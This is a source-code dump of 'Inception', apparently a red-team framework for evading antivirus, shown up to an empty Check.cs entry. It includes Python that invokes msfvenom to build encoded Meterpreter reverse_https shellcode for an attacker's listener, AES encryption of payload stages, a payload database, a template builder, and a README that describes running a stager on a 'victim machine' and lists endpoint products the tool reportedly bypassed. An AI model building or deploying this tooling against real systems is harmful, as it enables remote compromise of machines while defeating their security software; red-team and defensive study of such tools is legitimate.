├── Classes
    ├── Crypto_Handler.py
    ├── DB.py
    ├── Setup.py
    ├── Template_Builder.py
    ├── __init__.py
    └── shellcode_msf.py
├── Inception.py
├── LICENCE
├── README.md
├── RoslynLoad
    ├── .vs
    │   └── RoslynLoad
    │   │   ├── DesignTimeBuild
    │   │       └── .dtbcache
    │   │   └── v15
    │   │       ├── .suo
    │   │       └── Server
    │   │           └── sqlite3
    │   │               ├── storage.ide
    │   │               ├── storage.ide-shm
    │   │               └── storage.ide-wal
    ├── FodyWeavers.xml
    ├── RoslynLoad.sln
    └── RoslynLoad
    │   ├── App.config
    │   ├── Check.cs
    │   ├── Encrypt.cs
    │   ├── Program.cs
    │   ├── Properties
    │       └── AssemblyInfo.cs
    │   ├── RoslynLoad.csproj
    │   ├── RoslynLoad.csproj.user
    │   └── packages.config
├── Server.py
├── SharpDump.licence
├── Slides
    ├── AV Slides.key
    └── AV Slides.pptx
└── Templates
    ├── Custom
        └── SharpDump.txt
    └── ShellCode
        ├── ShellCode_Inject.txt
        └── ShellCode_Inject_64.txt


/Classes/Crypto_Handler.py:
--------------------------------------------------------------------------------
 1 | import base64
 2 | import hashlib
 3 | import os
 4 | from Crypto import Random
 5 | from Crypto.Cipher import AES
 6 | 
 7 | def GenerateKey():
 8 | 	random_data = os.urandom(128)
 9 | 	key = hashlib.md5(random_data).hexdigest()[:16]
10 | 	key32 = "".join([ ' ' if i >= len(key) else key[i] for i in range(16) ])
11 | 	return key32.encode('utf-8')
12 | 		
13 | 
14 | class AESCipher:
15 |     def __init__( self, key):
16 |         self.key = key
17 | 
18 |     def encrypt( self, raw ):
19 |         BS = 16
20 |         pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) 
21 |         raw = pad(raw)
22 |         iv = Random.new().read(BS)
23 |         cipher = AES.new(self.key, AES.MODE_CBC, iv)
24 |         res = iv + cipher.encrypt( raw )
25 |         return base64.b64encode(res)
26 | 
27 | def Encrypt(key, raw):
28 | 	crypt = AESCipher(key)
29 | 	return "{0}".format(crypt.encrypt(raw))
30 | 


--------------------------------------------------------------------------------
/Classes/DB.py:
--------------------------------------------------------------------------------
 1 | import sqlite3
 2 | import os
 3 | from os.path import isfile, expanduser
 4 | 
 5 | #globals - change these if needed
 6 | home = expanduser("~")
 7 | db_Path = home + '/.inception/DB.sq3'
 8 | 
 9 | #Check if the DB file esits - called from Inception.py
10 | def Check_DB_Exists():
11 | 	return os.path.isfile(db_Path)
12 | 
13 | #creates the payload table
14 | def Create_Schema():
15 | 	db = sqlite3.connect(db_Path)
16 | 	cursor = db.cursor()
17 | 	cursor.execute('''
18 | 	CREATE TABLE payload(encryption_key TEXT PRIMARY KEY, file_path TEXT unique, access_count INTEGER, allowed_access_count INTEGER)
19 | 	''')
20 | 	db.commit()
21 | 
22 | #insert a new payload record
23 | def Insert_Payload(encryption_key, file_path, allowed_access_count):
24 | 	db = sqlite3.connect(db_Path)
25 | 	cursor = db.cursor()
26 | 	cursor.execute('''
27 | 	INSERT INTO payload (encryption_key, file_path, access_count, allowed_access_count)
28 | 		VALUES(?,?,?,?)''', (encryption_key, file_path, 0, allowed_access_count))
29 | 	db.commit()
30 | 
31 | #Increment the access_count value for a given payload
32 | def Increment_Access_count(encryption_key):
33 | 	db = sqlite3.connect(db_Path)
34 | 	cursor = db.cursor()
35 | 	cursor.execute('''SELECT access_count from payload WHERE encryption_key=?''',(encryption_key,))
36 | 	current_count = cursor.fetchone()
37 | 	new_count = current_count[0] + 1
38 | 	cursor.execute('''UPDATE payload SET access_count = ? WHERE encryption_key = ?''', (new_count, encryption_key))
39 | 	db.commit()
40 | 
41 | 
42 | #Get a payload entry - returns a dictionary
43 | def Get_Payload(encryption_key):
44 | 	db = sqlite3.connect(db_Path)
45 | 	cursor = db.cursor()
46 | 	cursor.execute('''SELECT encryption_key, file_path, access_count, allowed_access_count FROM payload WHERE encryption_key = ?''', (encryption_key,))
47 | 	payload = cursor.fetchone()
48 | 	if payload is None:
49 | 		return None
50 | 	p = dict()
51 | 	p['encryption_key'] = payload[0]
52 | 	p['file_path'] = payload[1]
53 | 	p['access_count'] = payload[2]
54 | 	p['allowed_access_count'] = payload[3]
55 | 	return p
56 | 
57 | #cleanup - clear the DB file
58 | def Cleanup():
59 | 	db = sqlite3.connect(db_Path)
60 | 	cursor = db.cursor()
61 | 	cursor.execute('''DELETE FROM payload''')
62 | 	db.execute()
63 | 
64 | 
65 | 
66 | 
67 | 
68 | 


--------------------------------------------------------------------------------
/Classes/Setup.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from os.path import isdir, expanduser
 3 | 
 4 | home = expanduser("~")
 5 | path_root = home + '/.inception/'
 6 | path_payload_enc = path_root + 'payloads/'
 7 | path_payload_raw = path_root + 'payloads_raw/'
 8 | 
 9 | #check the directory structure exists
10 | def Check():
11 | 	check_path = os.path.isdir(path_root)
12 | 	check_payload = os.path.isdir(path_payload_enc)
13 | 	check_payload_raw = os.path.isdir(path_payload_raw)
14 | 	return check_path and check_payload and check_payload_raw
15 | 
16 | #create the directory structure
17 | def Create():
18 | 	try:
19 | 		if not os.path.isdir(path_root):
20 | 			os.makedirs(path_root)
21 | 		if not os.path.isdir(path_payload_enc):
22 | 			os.makedirs(path_payload_enc)
23 | 		if not os.path.isdir(path_payload_raw):
24 | 			os.makedirs(path_payload_raw)
25 | 	except:
26 | 		raise
27 | 
28 | 


--------------------------------------------------------------------------------
/Classes/Template_Builder.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | 
 3 | def BuildTemplate(shellcode, template, script_dir):
 4 | 	try:
 5 | 		rel_path = template
 6 | 		abs_file_path = os.path.join(script_dir, rel_path)
 7 | 		with open(abs_file_path, "r") as fr:
 8 | 			file_data = ''.join(fr.readlines())
 9 | 			output = file_data.replace("<SHELLCODE>", shellcode)
10 | 			return output	
11 | 	except IOError:
12 | 		print("ERROR: Could not read template file from " + abs_file_path)
13 | 		raise
14 | 
15 | 
16 | def WriteFile(path, content):
17 | 	try:	
18 | 		with open(path, "w") as fw:
19 | 			fw.write(content)
20 | 			fw.close()
21 | 	except:
22 | 		print("Error: Could not write data to file " + path)
23 | 		raise
24 | 
25 | def BuildCustomTemplate(template, script_dir):
26 | 	try:
27 | 		rel_path = template
28 | 		abs_file_path = os.path.join(script_dir, rel_path)
29 | 		with open(abs_file_path, "r") as fr:
30 | 			file_data = ''.join(fr.readlines())
31 | 			return file_data	
32 | 	except IOError:
33 | 		print("ERROR: Could not read template file from " + abs_file_path)
34 | 		raise
35 | 


--------------------------------------------------------------------------------
/Classes/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/Classes/__init__.py


--------------------------------------------------------------------------------
/Classes/shellcode_msf.py:
--------------------------------------------------------------------------------
 1 | from subprocess import *
 2 | 
 3 | def create_shellcode(msfroot, lhost, lport, arch):
 4 | 	msfvenom_cmd = None
 5 | 	msfvenom = msfroot + "/msfvenom"
 6 | 	if arch == "x86":
 7 | 		msfvenom_cmd = (msfvenom + " -p windows/meterpreter/reverse_https LHOST=" + lhost + " LPORT=" + lport + " -e x86/shikata_ga_nai -i 15 -f c")
 8 | 	elif arch == "x64":
 9 | 		msfvenom_cmd = (msfvenom + " -p windows/x64/meterpreter/reverse_https LHOST=" + lhost + " LPORT=" + lport + " -e x64/xor -f c")
10 | 	else:
11 | 		raise ValueError("Incorrect architecture value passed to create_shellcode.")
12 | 	return build_shellcode(msfvenom_cmd)
13 | 
14 | def build_shellcode(msf_command):
15 | 	msfhandle = Popen(msf_command, shell=True, stdout=PIPE)
16 | 	try:
17 | 		shellcode = msfhandle.communicate()[0].split("unsigned char buf[] = ")[1]
18 | 	except IndexError:
19 | 		print "Error: Do you have the right path to msfvenom?"
20 | 		raise
21 | 	#put this in a C# format
22 | 	shellcode = shellcode.replace('\\', ',0').replace('"', '').strip()[1:-1]
23 | 	return shellcode
24 | 	
25 | 
26 | 


--------------------------------------------------------------------------------
/Inception.py:
--------------------------------------------------------------------------------
  1 | import os
  2 | import sys
  3 | import readline
  4 | import uuid
  5 | from os.path import expanduser
  6 | from colorama import Style, Fore
  7 | from Classes.shellcode_msf import create_shellcode
  8 | from Classes.Crypto_Handler import *
  9 | from Classes.Template_Builder import *
 10 | from Classes.Setup import *
 11 | from Classes.DB import *
 12 | 
 13 | #config
 14 | msfroot = '/usr/bin' # change this as required
 15 | home = expanduser("~")
 16 | path_root = home + '/.inception/'
 17 | path_payload_enc = path_root + 'payloads/'
 18 | path_payload_raw = path_root + 'payloads_raw/'
 19 | 
 20 | #globals
 21 | menu_actions = {}
 22 | 
 23 | #===================
 24 | #Menu Functions
 25 | #===================
 26 | 
 27 | 
 28 | #header
 29 | def print_header():
 30 | 	print(" _____ _   _ _____  ___________ _____ _____ _____ _   _ ")
 31 | 	print("|_   _| \ | /  __ \|  ___| ___ \_   _|_   _|  _  | \ | |")
 32 | 	print("  | | |  \| | /  \/| |__ | |_/ / | |   | | | | | |  \| |")
 33 | 	print("  | | | . ` | |    |  __||  __/  | |   | | | | | | . ` |")
 34 | 	print(" _| |_| |\  | \__/\| |___| |     | |  _| |_\ \_/ / |\  |")
 35 | 	print(" \___/\_| \_/\____/\____/\_|     \_/  \___/ \___/\_| \_/")
 36 | 	print("")
 37 | 	print("'You mean, a dream within a dream?'")
 38 | 	print ("")
 39 | 
 40 | def print_help():
 41 | 	print "Shellcode payloads use meterpreter reverse_https payloads"
 42 | 	print "The following values are required:\n"
 43 | 	print "lhost - the IP address of the metasploit listener"
 44 | 	print "lport - the port to listen on"
 45 | 	print "architecture - either x64 (for 64 bit systems) or x86 (for 32 bit systems)"
 46 | 	print "relative path to the template file (/templates/<template>.txt)"
 47 | 	print ""
 48 | 	print ""
 49 | 	print "Custom templates allow arbitrary C# code to be executed"
 50 | 	print "Only the relative path to the template file is required"
 51 | 
 52 | #Main Menu
 53 | def main_menu():
 54 | 	print "Select payload type:"
 55 | 	print "1. Shellcode"
 56 | 	print "2. Custom"
 57 | 	print "3. Help"
 58 | 	print "0. Quit"
 59 | 	choice = raw_input(" >>  ")
 60 | 	exec_menu(choice)
 61 | 
 62 | #Execute menu
 63 | def exec_menu(choice):
 64 | 	ch = choice.lower()
 65 | 	if ch == '':
 66 | 		menu_actions['main_menu']()
 67 | 	else:
 68 | 		try:
 69 | 			menu_actions[ch]()
 70 | 		except KeyError:
 71 | 			print Fore.RED + "Invalid selection, please try again"
 72 | 			menu_actions['main_menu']()
 73 | 
 74 | #shellcode menu (menu 1)
 75 | #need to capture lhost, lport, arch and template here
 76 | def menu1():
 77 | 	print "\nSelect archetecture\n"
 78 | 	print "1. x86"
 79 | 	print "2. x64"
 80 | 	choice = raw_input(" >> ")
 81 | 	if choice == '1':
 82 | 		arch = "x86"
 83 | 	elif choice == '2':
 84 | 		arch = "x64"
 85 | 	else:
 86 | 		print Fore.RED + "Invalid selection, please try again"
 87 | 		menu_actions['menu1']()
 88 | 	print "\nEnter lhost value \n"
 89 | 	lhost = raw_input(" >> ")
 90 | 	print "\nEnter lport value \n"
 91 | 	lport = raw_input(" >>" )
 92 | 	print "\nEnter relative path to template file"
 93 | 	template_rel_path = raw_input(" >> ")
 94 | 	print "\nSelect action\n"
 95 | 	print "1. Generate"
 96 | 	print "2. Cancel"
 97 | 	choice = raw_input(" >> ")
 98 | 	if choice == '1':
 99 | 		Shellcode_Payload(lhost, lport, arch, template_rel_path)
100 | 	else:
101 | 		menu_actions['main_menu']()
102 | 
103 | #Custom menu (menu 2)
104 | #only need the template file here
105 | def menu2():
106 | 	print "\nEnter relative path to template file"
107 | 	template_rel_path = raw_input(" >> ")
108 | 	print "\nSelect action\n"
109 | 	print "1. Generate"
110 | 	print "2. Cancel"
111 | 	choice = raw_input(" >> ")
112 | 	if choice == '1':
113 | 		Custom_Payload(template_rel_path)
114 | 	else:
115 | 		menu_actions['main_menu']()
116 | 
117 | #Help menu (menu 3)
118 | #just back as an option
119 | def menu3():
120 | 	print_help()
121 | 	print "Press any key to return to the main menu."
122 | 	choice = raw_input(" >> ")
123 | 	menu_actions['main_menu']()
124 | 	
125 | def exit():
126 | 	sys.exit()
127 | 
128 | #===================
129 | #Menu Definitions
130 | #===================
131 | menu_actions = {
132 |     'main_menu': main_menu,
133 |     '1': menu1,
134 |     '2': menu2,
135 |     '3': menu3,
136 |     '0': exit,
137 | }
138 | 
139 | #overload print method to reset the colours, colorama Init() does not play well with tab completion >.<
140 | def print_normal(string):
141 | 	print Style.RESET_ALL + string
142 | 
143 | #===================
144 | #Payload Generation
145 | #===================
146 | def Shellcode_Payload(lhost, lport, arch, template_rel_path):
147 | 	try:
148 | 		print Fore.YELLOW + "[*] LHOST set to " + lhost
149 | 		print Fore.YELLOW + "[*] LPORT set to " + lport
150 | 		print Fore.YELLOW + "[*] arch set to " + arch
151 | 		print Fore.YELLOW + "[*] Building shellcode" + Style.RESET_ALL
152 | 		shellcode = create_shellcode(msfroot, lhost, lport, arch)
153 | 		print_normal("[*] Shellcode generated")
154 | 		print Fore.YELLOW + "[*] Using template " + template_rel_path
155 | 		print Fore.YELLOW + "[*] Generating raw stage from template"
156 | 		#Pass the base DIR of the script, avoids issues with TemplateBuilder.py using /Classes/ in the path
157 | 		template = BuildTemplate(shellcode, template_rel_path, os.path.dirname(__file__))
158 | 		file_name = str(uuid.uuid4())
159 | 		WriteFile(path_payload_raw + file_name, template)
160 | 		print_normal("[*] stage written to " + path_payload_raw)
161 | 		print Fore.YELLOW + "[*] Generating Encrypted stage"
162 | 		key = GenerateKey()
163 | 		stage_enc = Encrypt(key, template)
164 | 		WriteFile(path_payload_enc + file_name, stage_enc)
165 | 		Insert_Payload(key, path_payload_enc + file_name, 1)
166 | 		print_normal("[*] Encrypted stage written to " + path_payload_enc + file_name)
167 | 		print_normal("[*] Key value: " + key)
168 | 		menu_actions['main_menu']()
169 | 		
170 | 	except:
171 | 		print Fore.RED + "Error creating payload. Returning to menu..." + Style.RESET_ALL
172 | 		exec_menu('1')
173 | 
174 | def Custom_Payload(template_rel_path):
175 | 	try:
176 | 		print Fore.YELLOW + "[*] Using template " + template_rel_path
177 | 		print Fore.YELLOW + "[*] Generating Encrypted stage"
178 | 		key = GenerateKey()
179 | 		template = BuildCustomTemplate(template_rel_path, os.path.dirname(__file__))
180 | 		stage_enc = Encrypt(key, template)
181 | 		file_name = str(uuid.uuid4())
182 | 		WriteFile(path_payload_enc + file_name, stage_enc)
183 | 		Insert_Payload(key, path_payload_enc + file_name, 1)
184 | 		print_normal("[*] Encrypted stage written to " + path_payload_enc + file_name)
185 | 		print_normal("[*] Key value: " + key)
186 | 		menu_actions['main_menu']()
187 | 	except:
188 | 		print Fore.RED + "Error creating payload. Returning to menu..." + Style.RESET_ALL
189 | 		raise
190 | 		exec_menu('2')
191 | 
192 | #===================
193 | #Install checks
194 | #===================
195 | def Check_Installed():
196 | 	if not Check():
197 | 		print Fore.RED + "Directory structure not present. Attempting to create..." + Style.RESET_ALL
198 | 		try:
199 | 			Create()
200 | 		except:
201 | 			print Fore.RED + "Unable to create directory structure!"
202 | 			print Fore.RED + "Please check you have appropriate permissions to write to ~/"
203 | 			print Fore.RED + "Inception will now exit..." + Style.RESET_ALL
204 | 			sys.exit()
205 | 		print "[*] Directory structure created."
206 | 	if not Check_DB_Exists():
207 | 		print Fore.RED + "Database not initialised. Attempting to create..." + Style.RESET_ALL
208 | 		try:
209 | 			Create_Schema()
210 | 		except:
211 | 			print Fore.RED + "Error initialising database."
212 | 			print Fore.RED + "Inception will now exit..." + Style.RESET_ALL
213 | 			sys.exti()
214 | 		print "[*] Database initialised."
215 | 	print "[*] Initial setup complete!" 
216 | 
217 | readline.set_completer_delims('\t')
218 | readline.parse_and_bind("tab: complete")
219 | print_header()
220 | Check_Installed()
221 | main_menu()
222 | 
223 | 


--------------------------------------------------------------------------------
/LICENCE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 James Williams
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Inception Framework
  2 | 
  3 | Inception provides In-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
  4 | 
  5 | Inception has been successful in bypassing a number of AV products. These tests were conducted on a fully patched, 64-bit Windows 10 host using Metasploit Meterpreter shellcode.
  6 | 
  7 | | Product        | Bypass Type           |
  8 | | ------------- |:-------------:|
  9 | | Cylance     | 32-bit shellcode injection | 
 10 | | McAfee Endpoint  Adaptive Threat Protection      | 64-bit shellcode injection | 
 11 | | Sophos Intercept X     | 64-bit shellcode injection | 
 12 | | Symantec Endpoint 14      | 64-bit shellcode injection | 
 13 | | ESET Internet Security     | 64-bit shellcode injection | 
 14 | 
 15 | 
 16 | [@two06](https://twitter.com/two06) is the primary author of this project.
 17 | 
 18 | Inception is released under the MIT license. A derivative of the [SharpDump](https://github.com/GhostPack/SharpDump/)  project  is included with Inception, its licence file can be found in the SharpDump.licence file.
 19 | 
 20 | ## Requirements
 21 | 
 22 | Flask (pip install Flask)
 23 | Colorama (pip install Colorama)
 24 | 
 25 | ## Overview
 26 | 
 27 | Inception is comprised of three main components:
 28 | 
 29 | - The payload builder (inception.py)
 30 | - A payload server (server.py)
 31 | - The "stager", a .NET executable which must be launched on the victim machine. 
 32 | 
 33 | Payloads are built using Inception.py. Currently, two types of payload are supported:
 34 | 
 35 | - Shellcode
 36 | - Custom
 37 | 
 38 | These payload types are described in more detail below. Inception.py will guide you through the payload creation process, depending on which menu options are selected. 
 39 | 
 40 | Payloads are served using a Flask app (server.py). This app either serves the encrypted, pre-generated payload, or issues a redirect to a specified URL. Payloads are, by default, use-once. If an attempt to retrieve a payload which has already been used is made, the server will issue a redirect. If a non-existent payload is requested, the server will issue a redirect. 
 41 | 
 42 | The stager is a .NET application which fetches, decodes, compiles and executes the payload. This application must be run on the victim machine. The stager is large (~10MB) when built. 
 43 | 
 44 | ### Usage
 45 | 
 46 | Generate payloads using Inception.py
 47 | 
 48 | ```
 49 | python Inception.py                                                                                                   
 50 |  _____ _   _ _____  ___________ _____ _____ _____ _   _ 
 51 | |_   _| \ | /  __ \|  ___| ___ \_   _|_   _|  _  | \ | |
 52 |   | | |  \| | /  \/| |__ | |_/ / | |   | | | | | |  \| |
 53 |   | | | . ` | |    |  __||  __/  | |   | | | | | | . ` |
 54 |  _| |_| |\  | \__/\| |___| |     | |  _| |_\ \_/ / |\  |
 55 |  \___/\_| \_/\____/\____/\_|     \_/  \___/ \___/\_| \_/
 56 | 
 57 | 'You mean, a dream within a dream?'
 58 | 
 59 | [*] Initial setup complete!
 60 | Select payload type:
 61 | 1. Shellcode
 62 | 2. Custom
 63 | 3. Help
 64 | 0. Quit
 65 |  >>  1
 66 | 
 67 | ```
 68 | when firt run, Inception will generate a directory structure in ~/.inception/ containing the payload database, raw payload directory and encrypted payload directory. 
 69 | 
 70 | To serve payloads, run Server.py as root (Server.py listens on port 80).
 71 | 
 72 | ```
 73 | sudo python Server.py
 74 |  * Serving Flask app "Server" (lazy loading)
 75 |  * Environment: production
 76 |    WARNING: Do not use the development server in a production environment.
 77 |    Use a production WSGI server instead.
 78 |  * Debug mode: off
 79 |  * Running on http://0.0.0.0:80/ (Press CTRL+C to quit)
 80 | ```
 81 | Build the "RoslynLoad" .NET project, using visual studio. For 64-bit targets, the compiler MUST target x64. "Any CPU" can be used for 32-bit. 
 82 | 
 83 | Copy the generated EXE file to the victim machine and execute. 
 84 | 
 85 | ```
 86 | UpdateService.exe "http://payload.server.URL/<ENCRYPTION KEY>"
 87 | ```
 88 | The encryption key is displayed once a payload is generated using Inception.py
 89 | 
 90 | Note that a Metasploit listener must be running to receive the connect-back shell.
 91 | 
 92 | ### Shellcode Payloads
 93 | Shellcode payloads use msfvenom to generate x86 or x64 Meterpreter shellcode. In this version, only reverse_https payloads are supported. 
 94 | 
 95 | x86 payloads use x86/shijata_ga_nai encoding. 
 96 | x64 payloads use x64/xor encoding. 
 97 | 
 98 | Generated shellcode is injected into a specified template file. Two examples have been included with this release:
 99 | 
100 | - /Templates/Shellcode/ShellCode_Inject.txt
101 | - /Templates/shellcode/ShellCode_Inject_76.txt
102 | 
103 | Template files contain a tag, which indicates where the generated shellcode should be placed:
104 | 
105 | ```
106 | byte[] shellcode = new byte[] {
107 |      <SHELLCODE>
108 | };
109 | 
110 | ```
111 | 
112 | ### Custom Payloads
113 | 
114 | Custom payloads allow arbitrary C# programs to be encrypted and loaded on the victim machine. No payload generation occurs for these templates; they must be complete C# programs. 
115 | 
116 | A modified version of [SharpDump](https://github.com/GhostPack/SharpDump) has been included with this release. 
117 | 
118 | 
119 | ### Creating Payloads
120 | 
121 | New payloads can be created using the following template. For Shellcode payloads, the SHELLCODE tag may be used to indicate where to place the generated shellcode.
122 | 
123 | ```
124 | Using System;
125 | Using <other libraries>
126 | 
127 | namespace Inception
128 | {
129 | 	class Program
130 | 	{
131 | 		//other methods as required
132 | 		
133 | 		public static void Run()
134 | 		{
135 | 			//Entrypoint code here
136 | 		}
137 | 	}
138 | }
139 | ```
140 | If non-standard libraries are required, the appropriate reference must be added to the Roslyn compilation code. The following examples shows the "System.IO.Compression.GZStream" reference (used by SharpDump).
141 | 
142 | ```
143 | MetadataReference[] references = new MetadataReference[]
144 |             {
145 |                 MetadataReference.CreateFromFile(typeof(object).Assembly.Location),
146 |                 MetadataReference.CreateFromFile(typeof(Enumerable).Assembly.Location),
147 |                 MetadataReference.CreateFromFile(typeof(System.IO.Compression.GZipStream).Assembly.Location)
148 |             };
149 | ```
150 | 
151 | ## Acknowledgments
152 | 
153 | Lots of this code was modified from StackOverflow and various blog posts. If you see code that you wrote, which is not credited, please let me know and I'll be happy to add acknowledgements. 
154 | 
155 | 


--------------------------------------------------------------------------------
/RoslynLoad/.vs/RoslynLoad/DesignTimeBuild/.dtbcache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/RoslynLoad/.vs/RoslynLoad/DesignTimeBuild/.dtbcache


--------------------------------------------------------------------------------
/RoslynLoad/.vs/RoslynLoad/v15/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/RoslynLoad/.vs/RoslynLoad/v15/.suo


--------------------------------------------------------------------------------
/RoslynLoad/.vs/RoslynLoad/v15/Server/sqlite3/storage.ide:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/RoslynLoad/.vs/RoslynLoad/v15/Server/sqlite3/storage.ide


--------------------------------------------------------------------------------
/RoslynLoad/.vs/RoslynLoad/v15/Server/sqlite3/storage.ide-shm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/RoslynLoad/.vs/RoslynLoad/v15/Server/sqlite3/storage.ide-shm


--------------------------------------------------------------------------------
/RoslynLoad/.vs/RoslynLoad/v15/Server/sqlite3/storage.ide-wal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/RoslynLoad/.vs/RoslynLoad/v15/Server/sqlite3/storage.ide-wal


--------------------------------------------------------------------------------
/RoslynLoad/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Weavers>
3 |   <Costura />
4 | </Weavers>


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad.sln:
--------------------------------------------------------------------------------
 1 | ﻿
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.27130.2027
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RoslynLoad", "RoslynLoad\RoslynLoad.csproj", "{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Debug|x64 = Debug|x64
12 | 		Release|Any CPU = Release|Any CPU
13 | 		Release|x64 = Release|x64
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Debug|x64.Build.0 = Debug|x64
20 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Release|Any CPU.Build.0 = Release|Any CPU
22 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Release|x64.ActiveCfg = Release|x64
23 | 		{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}.Release|x64.Build.0 = Release|x64
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {D9FC1D72-04E9-4D3C-A1C3-BA4815D3A94E}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/App.config:
--------------------------------------------------------------------------------
 1 | ﻿<?xml version="1.0" encoding="utf-8"?>
 2 | <configuration>
 3 |     <startup> 
 4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
 5 |     </startup>
 6 |   <runtime>
 7 |     <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
 8 |       <dependentAssembly>
 9 |         <assemblyIdentity name="System.Collections.Immutable" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
10 |         <bindingRedirect oldVersion="0.0.0.0-1.2.1.0" newVersion="1.2.1.0" />
11 |       </dependentAssembly>
12 |       <dependentAssembly>
13 |         <assemblyIdentity name="System.IO.Compression" publicKeyToken="b77a5c561934e089" culture="neutral" />
14 |         <bindingRedirect oldVersion="0.0.0.0-4.1.2.0" newVersion="4.1.2.0" />
15 |       </dependentAssembly>
16 |       <dependentAssembly>
17 |         <assemblyIdentity name="System.IO.FileSystem" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
18 |         <bindingRedirect oldVersion="0.0.0.0-4.0.2.0" newVersion="4.0.2.0" />
19 |       </dependentAssembly>
20 |       <dependentAssembly>
21 |         <assemblyIdentity name="System.Security.Cryptography.Algorithms" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
22 |         <bindingRedirect oldVersion="0.0.0.0-4.1.0.0" newVersion="4.1.0.0" />
23 |       </dependentAssembly>
24 |       <dependentAssembly>
25 |         <assemblyIdentity name="System.Security.Cryptography.Primitives" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
26 |         <bindingRedirect oldVersion="0.0.0.0-4.0.1.0" newVersion="4.0.1.0" />
27 |       </dependentAssembly>
28 |       <dependentAssembly>
29 |         <assemblyIdentity name="System.IO.FileSystem.Primitives" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
30 |         <bindingRedirect oldVersion="0.0.0.0-4.0.2.0" newVersion="4.0.2.0" />
31 |       </dependentAssembly>
32 |       <dependentAssembly>
33 |         <assemblyIdentity name="System.Xml.XPath.XDocument" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
34 |         <bindingRedirect oldVersion="0.0.0.0-4.0.2.0" newVersion="4.0.2.0" />
35 |       </dependentAssembly>
36 |       <dependentAssembly>
37 |         <assemblyIdentity name="System.Threading.Thread" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
38 |         <bindingRedirect oldVersion="0.0.0.0-4.0.1.0" newVersion="4.0.1.0" />
39 |       </dependentAssembly>
40 |     </assemblyBinding>
41 |   </runtime>
42 | </configuration>


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/Check.cs:
--------------------------------------------------------------------------------
